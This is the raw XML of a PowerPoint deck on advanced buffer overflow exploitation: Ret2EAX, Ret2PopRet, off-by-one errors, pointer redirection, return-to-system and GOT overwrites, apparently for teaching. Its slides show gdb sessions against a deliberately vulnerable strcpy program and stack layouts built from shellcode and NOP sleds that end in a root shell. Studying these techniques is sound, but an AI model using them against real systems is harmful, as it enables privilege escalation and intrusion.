              <a:rPr lang="fr-FR" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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array command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17716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5650"/>
            <a:ext cx="4181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victim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314700"/>
            <a:ext cx="9029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981075" y="2966586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943475" y="2966586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81075" y="2966586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0069" y="258558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Argv</a:t>
            </a:r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72075" y="2966586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305800" y="2971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72075" y="2966586"/>
            <a:ext cx="313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1069" y="258558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Argv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got a shell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3743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 if ASLR is turned on we can hack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Pointers with buffer overflows helps hackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Corrupting the GOT is a novel way to hack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Ret2EAX, Ret2PopRet, and Off-by-one error are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owerful for special scenarios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not work for all scenarios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Try </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>these exploitation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Ethical hacking is OK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EAX before the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500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>) break *0x080483f7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>Breakpoint 1 at 0x80483f7: file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>victim_eax.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>, line 6.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>) r Hi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>Starting program: /home/dharma/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>victim_eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t> Hi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/>
              <a:t>Breakpoint 1, 0x080483f7 in function (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>=0xffffd4ed "Hi") at victim_eax.c:6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" indent="-914400">
              <a:buAutoNum type="arabicPlain" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" smtClean="0"/>
              <a:t>(buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" smtClean="0"/>
              <a:t>);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/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>) x/1xw $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd26c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>:	0x00000001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>) print &amp;buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0"/>
              <a:t>$4 = (char (*)[80]) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffd26c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 after the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break *0x080483fc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breakpoint 2 at 0x80483fc: file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victim_eax.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, line 7.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c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Continuing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breakpoint 2, function (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=0xffffd4ed "Hi") at victim_eax.c:7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7	}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x/s $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0xffffd26c:	 "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hi“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EAX contains the pointer to the buffer!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502-7039-408E-B37C-B61C0C049D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Victim’s program stack after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649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Pointer to call *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eax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 err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1]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28194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24500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45720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420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EBP-80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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to buffer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45951" y="3928764"/>
            <a:ext cx="1587795" cy="6432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Shell code (24 bytes)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261240" y="2743200"/>
            <a:ext cx="1587795" cy="1185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NOP (56 bytes)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67047" y="2286000"/>
            <a:ext cx="1587795" cy="637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NOP (4bytes)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260480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Return to main is overridden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Control will return to call *%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>eax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3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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[1] using a Perl script (step 1: copy and paste </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode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6960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6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2010</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>560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Office Theme</vt:lpstr>
      <vt:lpstr>Advanced Buffer Overflow Exploitation Techniques</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Ret2EAX</vt:lpstr>
      <vt:lpstr>Our victim</vt:lpstr>
      <vt:lpstr>EAX before the strcpy</vt:lpstr>
      <vt:lpstr>EAX after the strcpy</vt:lpstr>
      <vt:lpstr>Victim’s program stack after strcpy</vt:lpstr>
      <vt:lpstr>Constructing argv[1] using a Perl script (step 1: copy and paste shellcode)</vt:lpstr>
      <vt:lpstr>Step 2: Get address of call *%eax</vt:lpstr>
      <vt:lpstr>Step 3: NOP sled of 60 bytes</vt:lpstr>
      <vt:lpstr>Step 4: Construct argv string</vt:lpstr>
      <vt:lpstr>We got the shell as a root!</vt:lpstr>
      <vt:lpstr>Ret2PopRet</vt:lpstr>
      <vt:lpstr>Victim</vt:lpstr>
      <vt:lpstr>Hunt for a pop ret sequence</vt:lpstr>
      <vt:lpstr>Off-by-one is sometimes enough!</vt:lpstr>
      <vt:lpstr>Off-by-one error</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Redirecting String Pointers</vt:lpstr>
      <vt:lpstr>Assembly view</vt:lpstr>
      <vt:lpstr>Stack View</vt:lpstr>
      <vt:lpstr>Redirecting String Pointers</vt:lpstr>
      <vt:lpstr>Create a THIS program</vt:lpstr>
      <vt:lpstr>Redirecting Function Pointers</vt:lpstr>
      <vt:lpstr>Redirecting Function Pointers – Got a shell</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Problem</vt:lpstr>
      <vt:lpstr>Assumptions</vt:lpstr>
      <vt:lpstr>Victim</vt:lpstr>
      <vt:lpstr>Victim’s Assembly</vt:lpstr>
      <vt:lpstr>Victim’s program stack before strcpy</vt:lpstr>
      <vt:lpstr>Constructing an evil input?</vt:lpstr>
      <vt:lpstr>Create an environment variable</vt:lpstr>
      <vt:lpstr>Addresses of system and env. var?</vt:lpstr>
      <vt:lpstr>Construct input</vt:lpstr>
      <vt:lpstr>Victim’s program stack after strcpy</vt:lpstr>
      <vt:lpstr>Run the program</vt:lpstr>
      <vt:lpstr>Why crashed after exit from shell?</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Global Offset Table (GOT)?</vt:lpstr>
      <vt:lpstr>Another Victim</vt:lpstr>
      <vt:lpstr>Victim’s program stack before strcpy</vt:lpstr>
      <vt:lpstr>Where is printf?</vt:lpstr>
      <vt:lpstr>Where is system?</vt:lpstr>
      <vt:lpstr>Stack after the first strcpy</vt:lpstr>
      <vt:lpstr>Recall the victim</vt:lpstr>
      <vt:lpstr>Stack after the second strcpy</vt:lpstr>
      <vt:lpstr>Ready to attack the GOT</vt:lpstr>
      <vt:lpstr>Create an array command</vt:lpstr>
      <vt:lpstr>Run the victim</vt:lpstr>
      <vt:lpstr>We got a shell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</dc:creator>
  <cp:lastModifiedBy>Dharmalingam Ganesan</cp:lastModifiedBy>
  <cp:revision>97</cp:revision>
  <cp:lastPrinted>2015-04-09T21:19:39Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-07T17:15:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-08T22:47:15Z</dcterms:modified>
</cp:coreProperties>
</file>